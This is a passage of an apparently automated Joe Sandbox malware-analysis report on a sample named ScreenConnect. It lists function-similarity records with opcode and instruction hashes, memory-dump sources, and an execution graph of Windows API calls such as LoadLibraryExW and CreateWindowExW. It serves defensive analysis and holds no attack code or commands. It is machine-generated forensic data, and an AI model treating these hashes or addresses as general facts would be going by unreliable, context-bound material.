                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ec4c10fce2de9f5778aad1ab9a121e108bd6eeb47695da6096fe0109892166f8
                                                                        • Instruction ID: a279ee5fd1fed1a6bb564297619199420650f619673ca3126dc6ec7ae7c6f2f4
                                                                        • Opcode Fuzzy Hash: ec4c10fce2de9f5778aad1ab9a121e108bd6eeb47695da6096fe0109892166f8
                                                                        • Instruction Fuzzy Hash: 3301B179700A128F9724DF65C08491BB7E6FF8C22431440ACEA8ADB311CB21FC02EBC0
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 526131df78b0704ff3ca76f724cce1d57ca19af0ac641c44243464e0bb0a6635
                                                                        • Instruction ID: 99b7b0d0e07844f55cf1c5d3195393ae231cb7377daacfd7d4b96c4757d581c9
                                                                        • Opcode Fuzzy Hash: 526131df78b0704ff3ca76f724cce1d57ca19af0ac641c44243464e0bb0a6635
                                                                        • Instruction Fuzzy Hash: 9A01F2363003021BF319B6B6989056FF397EFC8168790A93CD11A9B350DE39FC058BA9
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2621205745.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_112d000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8a34a860647eca015b47448c9999792db613e46dd9d6abcc849fcc1ed4deab70
                                                                        • Instruction ID: ec60b84151fd538d14e13c6f6dd6d41cf1ec284626ada1157e466330724229b2
                                                                        • Opcode Fuzzy Hash: 8a34a860647eca015b47448c9999792db613e46dd9d6abcc849fcc1ed4deab70
                                                                        • Instruction Fuzzy Hash: 0301296140D3D05FEB164B25DC94762BFA8DF47264F1980DBE9848F2A3C2695C49CBB2
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2621205745.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_112d000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cb67b1c3d9124aabaf620b03c3790d9d1c3d7c4f73f4cafb3f4657a125e7f5bc
                                                                        • Instruction ID: 9823ebf5dae2c2dd42ecc7efe38f16b0c9ba0e2aa8f0feb718fe36c00b32b693
                                                                        • Opcode Fuzzy Hash: cb67b1c3d9124aabaf620b03c3790d9d1c3d7c4f73f4cafb3f4657a125e7f5bc
                                                                        • Instruction Fuzzy Hash: CE01F2710043509FFB188B65EC84B67BF98DF412A4F18C05AED484B292C37D9845CABA
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: acff232b59943f8a27284cd94d1ba51e6e3ef31c0cef963ab5c4c8d1c0e9da00
                                                                        • Instruction ID: 687b03303d9e1f4bf822d8d119e8161c181eaaa6c4b15705d365a36564909e2a
                                                                        • Opcode Fuzzy Hash: acff232b59943f8a27284cd94d1ba51e6e3ef31c0cef963ab5c4c8d1c0e9da00
                                                                        • Instruction Fuzzy Hash: 0201A4B6B0060A9FDB14CB78D8405EEBBF5FF88214B1484AAD944E7201E734A915CB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 02515503bb1714f4fd6e022e21868de8b08879e4c82940150bc517bd5313943b
                                                                        • Instruction ID: 920a3fe8bde253e151b342ad8c1cf73ea961cc0e237bc8d2559af2285df0e1a2
                                                                        • Opcode Fuzzy Hash: 02515503bb1714f4fd6e022e21868de8b08879e4c82940150bc517bd5313943b
                                                                        • Instruction Fuzzy Hash: 43014670B042098FDB54DFA8C454A6EBBF2BF49304F1090A9E90ADB361EF34E940CB81
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0d3a97035d6e3a9f0bdd1fd4dcbf399c0b3591cce04d167bd7c76f4e6ee02c79
                                                                        • Instruction ID: 78a5fb69754447b34115bb223ddc38cbf48269cb85a1f05489e8ac4ccddb7770
                                                                        • Opcode Fuzzy Hash: 0d3a97035d6e3a9f0bdd1fd4dcbf399c0b3591cce04d167bd7c76f4e6ee02c79
                                                                        • Instruction Fuzzy Hash: 3FF0C2A038E7C06FC746CB7898A14997FB2EE472503A651EAD089CB1B3E918894B8701
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5acd53531b8e2cda0848de6ba33fd9b56183caf7e82a7892dcf0a96852603f5e
                                                                        • Instruction ID: 8652ffdd9c01c15a42beaad6239b2942ec303af3d8e47c24b40002677b4be048
                                                                        • Opcode Fuzzy Hash: 5acd53531b8e2cda0848de6ba33fd9b56183caf7e82a7892dcf0a96852603f5e
                                                                        • Instruction Fuzzy Hash: 98F09030E4024ADFDF20DF64E8147AE7BF4EB44324F01596AD0109B240DF7C29998F81
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 71e73ef28a63a42d9abae9fc69cce27c97277aedae031eea9cc748d28498db01
                                                                        • Instruction ID: 6720c886f1c36c5225dd7b0c764e12badd9fe461a3b3a42b9a0f1f5772931ca0
                                                                        • Opcode Fuzzy Hash: 71e73ef28a63a42d9abae9fc69cce27c97277aedae031eea9cc748d28498db01
                                                                        • Instruction Fuzzy Hash: 0BF0F6B2D553C69FEB218F30E4907A83FF1DB21224F006A9AC0918B192DF7C164B8F41
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f6b3383ec4138586a5ba0ae56397f2afc2750db770ca8bcacbb1da4401a04fc8
                                                                        • Instruction ID: 2c7ae09fbb54a81ca2ee6cb05ab3dd77f5159d749f04e4cc52d572df4d38e4c0
                                                                        • Opcode Fuzzy Hash: f6b3383ec4138586a5ba0ae56397f2afc2750db770ca8bcacbb1da4401a04fc8
                                                                        • Instruction Fuzzy Hash: 9BF08C35342340CFE3158B28C144A957BE2EF8A721B5A94FAD5898B3A2CA71EC42CB40
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 326d997a148de0bc6bffb2351bad9b670fb3e207438e1e86cb264b17aeaf22b8
                                                                        • Instruction ID: cd8059d67339d38adc9531ded6efcb7bffc44512a0937db5cf10021149fec4d4
                                                                        • Opcode Fuzzy Hash: 326d997a148de0bc6bffb2351bad9b670fb3e207438e1e86cb264b17aeaf22b8
                                                                        • Instruction Fuzzy Hash: 52E092353003008FD3149B19C404E56B7E6EFC9714B5594ADE5898B761CB71FC41CB40
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f58b6e69ea59e9971a34c749080e9713ff3da9733352c6cd52053138309893a8
                                                                        • Instruction ID: 77dc7cf9f0f8665ad34394749f1cca72a68e7ae6b50c33cdfe8b0e8e9022cf4d
                                                                        • Opcode Fuzzy Hash: f58b6e69ea59e9971a34c749080e9713ff3da9733352c6cd52053138309893a8
                                                                        • Instruction Fuzzy Hash: E5F0A571D04629DFC750EFB8D9015AAFBF4EF49204B2084BAC959DB211E7328612CFD1
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a6210e3695547e43325bf808d406e102523849ef773b1542993a0fc70637d387
                                                                        • Instruction ID: 399c28a7c32f0220fa6aa535eff2c2c846845185164f7bb4cfaed1926673ae1c
                                                                        • Opcode Fuzzy Hash: a6210e3695547e43325bf808d406e102523849ef773b1542993a0fc70637d387
                                                                        • Instruction Fuzzy Hash: 95E048B1D0634DEFDB01EF64E85159CBBB4EF45204B0145EED408D7261EA345F01CB45
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b6ce740c7db64eb0b0a1680472b8728bf62fea086f69e8d98dc3599004ff1492
                                                                        • Instruction ID: d2cc25e72047ff7d3b43581f11d032ed0b80c47f93fa286cd0160e829cd44635
                                                                        • Opcode Fuzzy Hash: b6ce740c7db64eb0b0a1680472b8728bf62fea086f69e8d98dc3599004ff1492
                                                                        • Instruction Fuzzy Hash: 9EE08C323106544FC614EA2EE840C4A73E9AFC8A20301067AE1098B730DAA0ED028788
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fa926553dbea9c7a5430891b9108979a3f16cc4d36da4f487aa00aa9d94c7079
                                                                        • Instruction ID: f32a3631cf4b5d24c2e76990ed2398faf26b4a44a024ea57b3e4aee70a4d5376
                                                                        • Opcode Fuzzy Hash: fa926553dbea9c7a5430891b9108979a3f16cc4d36da4f487aa00aa9d94c7079
                                                                        • Instruction Fuzzy Hash: 58E09A71D001199F8B40DFA9990159EFBF4EB48210B10806AD919E7201E2319A118FD1
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2fe2612ae3633cf0f5cc545919e0c0c1c8fac2583e672c72913f980064a9aa23
                                                                        • Instruction ID: 0c5f6fd7b60ed37ed94d672d809cae556202c2c3020cb8a259141907ff9ddb25
                                                                        • Opcode Fuzzy Hash: 2fe2612ae3633cf0f5cc545919e0c0c1c8fac2583e672c72913f980064a9aa23
                                                                        • Instruction Fuzzy Hash: 03D05E343906144FC784E73CE45496A77DEAF8866136181A4E50DCB320EE25EC4047D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5b282c671fe584577c79ad564a6dfd3d42e7f6b05f0aea571e23e9b3de6100b9
                                                                        • Instruction ID: 1b89c2759c2222ad3568f7e69d5edd28a20bcc3f71012999c5d6c6ae829d4abb
                                                                        • Opcode Fuzzy Hash: 5b282c671fe584577c79ad564a6dfd3d42e7f6b05f0aea571e23e9b3de6100b9
                                                                        • Instruction Fuzzy Hash: 65E0123AD1020DAFCF519FE4E84DD98BBF5EB0830570081E5E50693231EB359528DF81
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 649f232d948695a260c490286e36cd71b08ea468b68dc7565819ffd9def2a7a2
                                                                        • Instruction ID: eb5f83a2402e6d5db16ca847861ac5c4ee37f41110b9af41287869771db1a21d
                                                                        • Opcode Fuzzy Hash: 649f232d948695a260c490286e36cd71b08ea468b68dc7565819ffd9def2a7a2
                                                                        • Instruction Fuzzy Hash: B5D01770A1134DEB9B00FFA8E90155DF7B9EB49204B1055ADE808E3210EA356F109B95
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 94d8d8d2810bf644c5a229cac16236c7a2b8b0f1cbb6c746f945d5f3ece5cf0f
                                                                        • Instruction ID: 05e57478c86c1be750979ceabfd17b2a913ef7613f15540b24da38bb0d2f8a6a
                                                                        • Opcode Fuzzy Hash: 94d8d8d2810bf644c5a229cac16236c7a2b8b0f1cbb6c746f945d5f3ece5cf0f
                                                                        • Instruction Fuzzy Hash: 83D05EB0A0120CEFDB00DFA8EA0159DB7F9FB44204B104AE9D40AE7200EA396F10DB95
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4f2063850e8477b60373eea71e31ab306f2f33d3e44952b287e3aea731729e89
                                                                        • Instruction ID: 98493dc9053c6c9b34ff9c092e1bcd29bac0a77f0fbc1e35da3ab051efc941c5
                                                                        • Opcode Fuzzy Hash: 4f2063850e8477b60373eea71e31ab306f2f33d3e44952b287e3aea731729e89
                                                                        • Instruction Fuzzy Hash: 4DC02B1430F3C04FCF061A3104901393D990F813C0F4A04EEE0C2C70D3C91C84949322
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0b16644d81d4ddb6ec8f2b684a2c94e38d2dd89c8a050864629d1559e8a1a205
                                                                        • Instruction ID: e75c64bca5287042bd3e1561bf5440c3e8b8323824ad0d2e274ea5956a41e33a
                                                                        • Opcode Fuzzy Hash: 0b16644d81d4ddb6ec8f2b684a2c94e38d2dd89c8a050864629d1559e8a1a205
                                                                        • Instruction Fuzzy Hash: 09C0023040D381DFCB036B34A865569FFE8AF87201F1748BEC0D1C6452E6680899CB63

                                                                        Execution Graph

                                                                        Execution Coverage:13.5%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:15
                                                                        Total number of Limit Nodes:0
                                                                        execution_graph 16654 7ffb1042b3ed 16656 7ffb1042b3ff 16654->16656 16655 7ffb1042b441 16656->16655 16657 7ffb1042b6a9 GetModuleHandleW 16656->16657 16658 7ffb1042b6dd 16657->16658 16667 7ffb10434955 16668 7ffb1043496f 16667->16668 16669 7ffb10434aa4 CallWindowProcW 16668->16669 16670 7ffb10434a12 16668->16670 16669->16670 16659 7ffb1042d4a6 16660 7ffb1042d4b5 LoadLibraryExW 16659->16660 16662 7ffb1042d58b 16660->16662 16663 7ffb10430894 16664 7ffb104308be CreateWindowExW 16663->16664 16666 7ffb1043097c 16664->16666

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2655273375.00007FFB10420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10420000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffb10420000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID: 6m$ ".m
                                                                        • API String ID: 4139908857-1693057919
                                                                        • Opcode ID: b610976d45ffce23ea576713755897c9aaed54774ccecb9a6ad5c68bd863b8b0
                                                                        • Instruction ID: a067978f727a8fb8a25687fccd834a4d72e5f1d6b0aa3e2a89f17a94fda1d252
                                                                        • Opcode Fuzzy Hash: b610976d45ffce23ea576713755897c9aaed54774ccecb9a6ad5c68bd863b8b0
                                                                        • Instruction Fuzzy Hash: 21B1D1B0A08E4A9FE759DB38D4957A57BE2FF58360F04417AD04DC7692DF34A861CB80

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 577 7ffb10434955-7ffb10434a00 584 7ffb10434aeb-7ffb10434b0b 577->584 585 7ffb10434a06-7ffb10434a10 577->585 593 7ffb10434b0e-7ffb10434b22 584->593 586 7ffb10434a12-7ffb10434a5d 585->586 587 7ffb10434a7a-7ffb10434ad1 CallWindowProcW 585->587 595 7ffb10434a5f 586->595 596 7ffb10434a65-7ffb10434a75 586->596 591 7ffb10434ad3 587->591 592 7ffb10434ad9-7ffb10434ae9 587->592 591->592 592->593 595->596 596->593
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2655273375.00007FFB10420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10420000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffb10420000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: CallProcWindow
                                                                        • String ID:
                                                                        • API String ID: 2714655100-0
                                                                        • Opcode ID: eec1b0fc9df0821b26cf908104600d5c2172706c584c6a7032e60e07b340354b
                                                                        • Instruction ID: a8e9af19a9e03cd8251068c2752b86aeeba9d7007e489ba50627e0fae953d729
                                                                        • Opcode Fuzzy Hash: eec1b0fc9df0821b26cf908104600d5c2172706c584c6a7032e60e07b340354b
                                                                        • Instruction Fuzzy Hash: 6061C57050DB998FDB55DF28C8556A57FF0FF65310F0801AED08ACB292DB64B815CB92

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 597 7ffb1042d4a6-7ffb1042d4b3 598 7ffb1042d4be-7ffb1042d4cf 597->598 599 7ffb1042d4b5-7ffb1042d4bd 597->599 600 7ffb1042d4d1-7ffb1042d4d9 598->600 601 7ffb1042d4da-7ffb1042d545 598->601 599->598 600->601 604 7ffb1042d54f-7ffb1042d589 LoadLibraryExW 601->604 605 7ffb1042d547-7ffb1042d54c 601->605 606 7ffb1042d58b 604->606 607 7ffb1042d591-7ffb1042d5b9 604->607 605->604 606->607
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2655273375.00007FFB10420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10420000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffb10420000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 1029625771-0
                                                                        • Opcode ID: 7ace6c9d0b64b8d3480019800a5ea295cba517381d42c886452461fee99664e6
                                                                        • Instruction ID: 43e71fbeb152cc9c93d56fa16b4db95f94dff2d6220e7aa30091abcdf0ca45cf
                                                                        • Opcode Fuzzy Hash: 7ace6c9d0b64b8d3480019800a5ea295cba517381d42c886452461fee99664e6
                                                                        • Instruction Fuzzy Hash: E941297190CB888FD725EBA8DC466E97BF0EF56321F04026FD089C3252DA74A456C792

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2655273375.00007FFB10420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10420000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffb10420000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: eabe09de9c0e7d1b25dc3e0cd92075edc25a61eb9b1c7b2bfa0ed525a1f043ce
                                                                        • Instruction ID: 928e7904ae02652fbb181155c44546ad67ebb34790f4c09f2bc940743ed1eef1
                                                                        • Opcode Fuzzy Hash: eabe09de9c0e7d1b25dc3e0cd92075edc25a61eb9b1c7b2bfa0ed525a1f043ce
                                                                        • Instruction Fuzzy Hash: 3F41F4B190CB1D8FEB64EB58DC467A9B7F0FB55320F0042AED04DD7212DA71A985CB81

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2655273375.00007FFB10420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10420000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffb10420000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: ac86fad9e2a28afc9468b4e6600e9f52431679491ad7e5ce5f615d0114bcf03d
                                                                        • Instruction ID: 4b5ff65f5ec076e65cf5d5f5e40c5ebc8d5dd6ba9ade6305e9095396dba10412
                                                                        • Opcode Fuzzy Hash: ac86fad9e2a28afc9468b4e6600e9f52431679491ad7e5ce5f615d0114bcf03d
                                                                        • Instruction Fuzzy Hash: CF412D70918A188FDBA8DF58D845BA9B7F1FB58711F0082DEE04DE3251CB70AD858F81
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2644436026.00007FFB10080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10080000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffb10080000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: b4m
                                                                        • API String ID: 0-2183738599
                                                                        • Opcode ID: 25ba8a3fee167837917cd80a493db9d83700e34896a33dd643534375496f09e6
                                                                        • Instruction ID: 9b28f12652e80a4ec84fe83fb8308c7a379e4e4a92dc79cada4ad052ea9733f5
                                                                        • Opcode Fuzzy Hash: 25ba8a3fee167837917cd80a493db9d83700e34896a33dd643534375496f09e6
                                                                        • Instruction Fuzzy Hash: C081A1B0D0CA498FD748DF68C4556ADBBE2FF89310F6405BEE04AC7396DE38A8458B41
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2644436026.00007FFB10080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10080000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffb10080000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: /m
                                                                        • API String ID: 0-777800384
                                                                        • Opcode ID: 5a1e26d6ca043fa005d2f57e245d337e8b57835b40b24e041fd5cdb5d36d1b69
                                                                        • Instruction ID: c93c6941cbfd27e2f155c61e156854c15e984f00e9de1ca43b5942b3057522dd
                                                                        • Opcode Fuzzy Hash: 5a1e26d6ca043fa005d2f57e245d337e8b57835b40b24e041fd5cdb5d36d1b69
                                                                        • Instruction Fuzzy Hash: 0851E6A2E1CD8D4FE7A5EA3CC859A7577D2FF98360B5401BAD04DC329AED14AC458381
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2644436026.00007FFB10080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10080000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffb10080000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: /m
                                                                        • API String ID: 0-777800384
                                                                        • Opcode ID: 12b389b9c7a7160772094086be2644cf6e85e0536978fe8aab90ac33f099d33b
                                                                        • Instruction ID: 4ba5b687176e4e555b9a41ec646e351972891ce1d0d29cf0bd857bd63a51f6a7
                                                                        • Opcode Fuzzy Hash: 12b389b9c7a7160772094086be2644cf6e85e0536978fe8aab90ac33f099d33b
                                                                        • Instruction Fuzzy Hash: 8351D161B18D4D4FE7A4EB2CD899B6973D2FF98360B5401BAE44DC339AED14EC818381
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2644436026.00007FFB10080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10080000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffb10080000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: P:/m
                                                                        • API String ID: 0-3802830192
                                                                        • Opcode ID: 836a399a90639dad5508e4d089502995d5d9ff778896775d13ce37270c51cf8a
                                                                        • Instruction ID: ac1867057984adacdac90f48059ca94f9a3445d154b6da8744a23d16eed2048b
                                                                        • Opcode Fuzzy Hash: 836a399a90639dad5508e4d089502995d5d9ff778896775d13ce37270c51cf8a
                                                                        • Instruction Fuzzy Hash: 43F02862A5CE894FD799A23894556E97792FFA5220B5802BBD04AC6186ED089C424381
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2644436026.00007FFB10080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10080000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffb10080000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9165f26145b368b3a141eaeba4e4dc56fe818541cf300c00fd1b6b82f01cf4e6
                                                                        • Instruction ID: 64d0e1a27481199839342a83d1af89f66134829cca07f1a8ffcb02519f1db0a9
                                                                        • Opcode Fuzzy Hash: 9165f26145b368b3a141eaeba4e4dc56fe818541cf300c00fd1b6b82f01cf4e6
                                                                        • Instruction Fuzzy Hash: 3961C1B590DE0E8FEBB8DA28C0696B977D3EF54360F50153DD08E83795EE68BC028640
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2644436026.00007FFB10080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10080000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffb10080000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9b22aacf3f30c2c8114ee354d1caab95935ce2a08a99508444772240f7780f51
                                                                        • Instruction ID: 54edf21d74d2f6a67d1e084f52a0c677d0a3086cdcaacbba2bffbe9425ea6ce8
